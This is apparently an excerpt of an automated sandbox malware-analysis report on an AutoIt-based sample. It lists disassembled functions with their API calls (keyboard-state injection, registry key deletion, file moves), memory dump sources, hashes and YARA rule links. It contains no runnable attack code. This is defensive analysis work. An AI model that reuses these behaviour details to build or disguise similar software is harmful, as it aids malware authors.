                                                                                                                                        Function 007A45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(00000000), ref: 007A4638
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A464D
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A46AE
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A46DA
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A46F7
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A473B
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A475C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 1d3a4fe50b4943dff04bf11cc915ea54869aef9812aed0e5fc41011c1df2bcd1
                                                                                                                                        • Instruction ID: 89fe9b36e5bc3cf0a13d99630b59a4dd2456439b6c61732be06509ebd44a5d68
                                                                                                                                        • Opcode Fuzzy Hash: 1d3a4fe50b4943dff04bf11cc915ea54869aef9812aed0e5fc41011c1df2bcd1
                                                                                                                                        • Instruction Fuzzy Hash: DE51E5A09047D57DFB3687248C45B76BFA96BC7300F088688E1D54A8C2D3DEEC98DB61
                                                                                                                                        Function 007A86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                        • Opcode ID: 004e3adbfd74491ee5f17e4da4d6465122c0691c3ed7c297246aa2017b030857
                                                                                                                                        • Instruction ID: 25fa4882619a142ad4fb53ce20b08758515febe708bc2de9968654fba4487104
                                                                                                                                        • Opcode Fuzzy Hash: 004e3adbfd74491ee5f17e4da4d6465122c0691c3ed7c297246aa2017b030857
                                                                                                                                        • Instruction Fuzzy Hash: 51417075C50214B9CB50FBF4C88B9CFB7ACAF05310F508966E554F3122FA38E25687A6
                                                                                                                                        Function 007C3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 007C3C92
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C3CBC
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C3D71
                                                                                                                                          • Part of subcall function 007C3C63: RegCloseKey.ADVAPI32(?), ref: 007C3CD9
                                                                                                                                          • Part of subcall function 007C3C63: FreeLibrary.KERNEL32(?), ref: 007C3D2B
                                                                                                                                          • Part of subcall function 007C3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C3D4E
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 007C3D16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 395352322-0
                                                                                                                                        • Opcode ID: 3463c4250f107c33531ce6c00e6daf2f5e50b0118854862d3a397945834e3223
                                                                                                                                        • Instruction ID: 5e1b9d427116d48decbc9146fe4af5727b681f6fa12e2da02c5035279582ff4c
                                                                                                                                        • Opcode Fuzzy Hash: 3463c4250f107c33531ce6c00e6daf2f5e50b0118854862d3a397945834e3223
                                                                                                                                        • Instruction Fuzzy Hash: 71311C71A01209BFDB249B94DC89EFEB7BCEF08300F04856EE512E6151E7789F499B60
                                                                                                                                        Function 007C8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007C8DF4
                                                                                                                                        • GetWindowLongW.USER32(0118A910,000000F0), ref: 007C8E27
                                                                                                                                        • GetWindowLongW.USER32(0118A910,000000F0), ref: 007C8E5C
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007C8E8E
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007C8EB8
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C8EC9
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C8EE3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                        • Opcode ID: d328a2a491f2e5f405e7e27ab7f49b8e83d1935b1275cf79aff2687cb34ed31f
                                                                                                                                        • Instruction ID: f49e3083dac8abaa08cce2ca1699f7e59e07652f58415d7d829ffa0402874439
                                                                                                                                        • Opcode Fuzzy Hash: d328a2a491f2e5f405e7e27ab7f49b8e83d1935b1275cf79aff2687cb34ed31f
                                                                                                                                        • Instruction Fuzzy Hash: 4E310E31200254EFDB608F98DCC8F9537A5FB5A754F2981ACF5158F2B2CB6AAC419B42
                                                                                                                                        Function 007A16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A1734
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A175A
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007A175D
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A177B
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007A1784
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007A17A9
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A17B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: f1f0a047721e33c917941eda95c645b9806cf52214199c78670af555af1b0e80
                                                                                                                                        • Instruction ID: 3130e405bb95f176f6ee66fbf3391593bdc85f002ce5c62d8ff87cd9b9f3fad5
                                                                                                                                        • Opcode Fuzzy Hash: f1f0a047721e33c917941eda95c645b9806cf52214199c78670af555af1b0e80
                                                                                                                                        • Instruction Fuzzy Hash: F3216575605219AFAB10DBA8CC88CAF73ECEB5E360B408225F915DF290D778EC418764
                                                                                                                                        Function 007A69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 007A6A2B
                                                                                                                                        • _wcscmp.LIBCMT ref: 007A6A49
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6A62
                                                                                                                                          • Part of subcall function 007A6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007A6DBA
                                                                                                                                          • Part of subcall function 007A6D6D: GetLastError.KERNEL32 ref: 007A6DC5
                                                                                                                                          • Part of subcall function 007A6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6DD9
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6AA4
                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 007A6B0C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                                        • Opcode ID: 0269c12c2972f6c5756bc41874c8fdda00dddfa62520e348964533a63b9571dd
                                                                                                                                        • Instruction ID: a7953e1e3ff00404543f79f6371ec3a0a016f6d606d4edca367e77eff946cd72
                                                                                                                                        • Opcode Fuzzy Hash: 0269c12c2972f6c5756bc41874c8fdda00dddfa62520e348964533a63b9571dd
                                                                                                                                        • Instruction Fuzzy Hash: 643136B1900218AACF50EFB4DC49ADDB7B8AF49300F5485EAE505E7141EB389B89CF65
                                                                                                                                        Function 007A2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                                        • Opcode ID: 13df1d566e3429b6a6542f351cbf552bb3c3ce08ebe470168b6b61962e9a0387
                                                                                                                                        • Instruction ID: 4c2328f6e21a9a85dfbd71562e206525f23d55a8f3ad630a6db15874695aa514
                                                                                                                                        • Opcode Fuzzy Hash: 13df1d566e3429b6a6542f351cbf552bb3c3ce08ebe470168b6b61962e9a0387
                                                                                                                                        • Instruction Fuzzy Hash: B9216E72144515BFC231BB349C0AEBB73E99F97351F104225F58587182EB9D9E83D3A0
                                                                                                                                        Function 007A17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A180D
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A1833
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007A1836
                                                                                                                                        • SysAllocString.OLEAUT32 ref: 007A1857
                                                                                                                                        • SysFreeString.OLEAUT32 ref: 007A1860
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007A187A
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 007A1888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: aa7782330c8a18ffa57a6a240818509cf5878c8f5a54b7c8aa61829c3d497c56
                                                                                                                                        • Instruction ID: daeb38445a5e5390da85b014ed5c401e55eddb6a9b5dcce43a9ac3d34dfce041
                                                                                                                                        • Opcode Fuzzy Hash: aa7782330c8a18ffa57a6a240818509cf5878c8f5a54b7c8aa61829c3d497c56
                                                                                                                                        • Instruction Fuzzy Hash: 2F214775601114AFAB109BE8CC89DBE77ECEB4E370B808225F915DF2A0D678EC418764
                                                                                                                                        Function 007CA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007CA13B
                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007CA148
                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007CA153
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007CA162
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007CA16E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                        • Opcode ID: 9518499f45835af8eb1ea9e3ab8d2a55d36a4dacf2a300a468becdaf389dd3da
                                                                                                                                        • Instruction ID: bd4c7d4c3092850250546a6244c057e65419e421365e21832874ba6747fdc2e3
                                                                                                                                        • Opcode Fuzzy Hash: 9518499f45835af8eb1ea9e3ab8d2a55d36a4dacf2a300a468becdaf389dd3da
                                                                                                                                        • Instruction Fuzzy Hash: D31182B115021DBFEF115F65CC86EE77F6DEF08798F118219FA08A6090C6769C21DBA4
                                                                                                                                        Function 00784C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00784C3E
                                                                                                                                          • Part of subcall function 007886B5: GetLastError.KERNEL32(?,00780127,007888A3,00784673,?,?,00780127,?,0076125D,00000058,?,?), ref: 007886B7
                                                                                                                                          • Part of subcall function 007886B5: __calloc_crt.LIBCMT ref: 007886D8
                                                                                                                                          • Part of subcall function 007886B5: GetCurrentThreadId.KERNEL32 ref: 00788701
                                                                                                                                          • Part of subcall function 007886B5: SetLastError.KERNEL32(00000000,00780127,007888A3,00784673,?,?,00780127,?,0076125D,00000058,?,?), ref: 00788719
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00784C1D), ref: 00784C52
                                                                                                                                        • __freeptd.LIBCMT ref: 00784C59
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,00784C1D), ref: 00784C61
                                                                                                                                        • GetLastError.KERNEL32(?,?,00784C1D), ref: 00784C91
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00784C1D), ref: 00784C98
                                                                                                                                        • __freefls@4.LIBCMT ref: 00784CB4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1445074172-0
                                                                                                                                        • Opcode ID: c69bc038da4469c7cdaead2b7f215ef88eb54fd0af382dbf2f1bea333a712bdb
                                                                                                                                        • Instruction ID: 1ff3aa1ff9c80b0e9264d12f244f410a9dc29b456b6fc8350feaaad76889d2ee
                                                                                                                                        • Opcode Fuzzy Hash: c69bc038da4469c7cdaead2b7f215ef88eb54fd0af382dbf2f1bea333a712bdb
                                                                                                                                        • Instruction Fuzzy Hash: 5B01BCB0542642EBC768BBA4D94D9097BA9BF083147108518F518CB652EF3DDC428BA2
                                                                                                                                        Function 0077C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0077C6C0
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077C701
                                                                                                                                        • ScreenToClient.USER32(?,000000FF), ref: 0077C729
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0077C856
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0077C86F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                        • Opcode ID: acf32468aedc2a95f9064bc11f0adf898cf1cec17ded165a6b8d34ba44e257a0
                                                                                                                                        • Instruction ID: d6d8ca36bb61346e3b7be691c7a882b05fac6c39f0abdbe71509ea7d5cc598ee
                                                                                                                                        • Opcode Fuzzy Hash: acf32468aedc2a95f9064bc11f0adf898cf1cec17ded165a6b8d34ba44e257a0
                                                                                                                                        • Instruction Fuzzy Hash: B4B14539A00249DBDF15CFA8C4807EDB7B1FF08340F14D52AEC59AB254EB38AA40CB65
                                                                                                                                        Function 007A9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
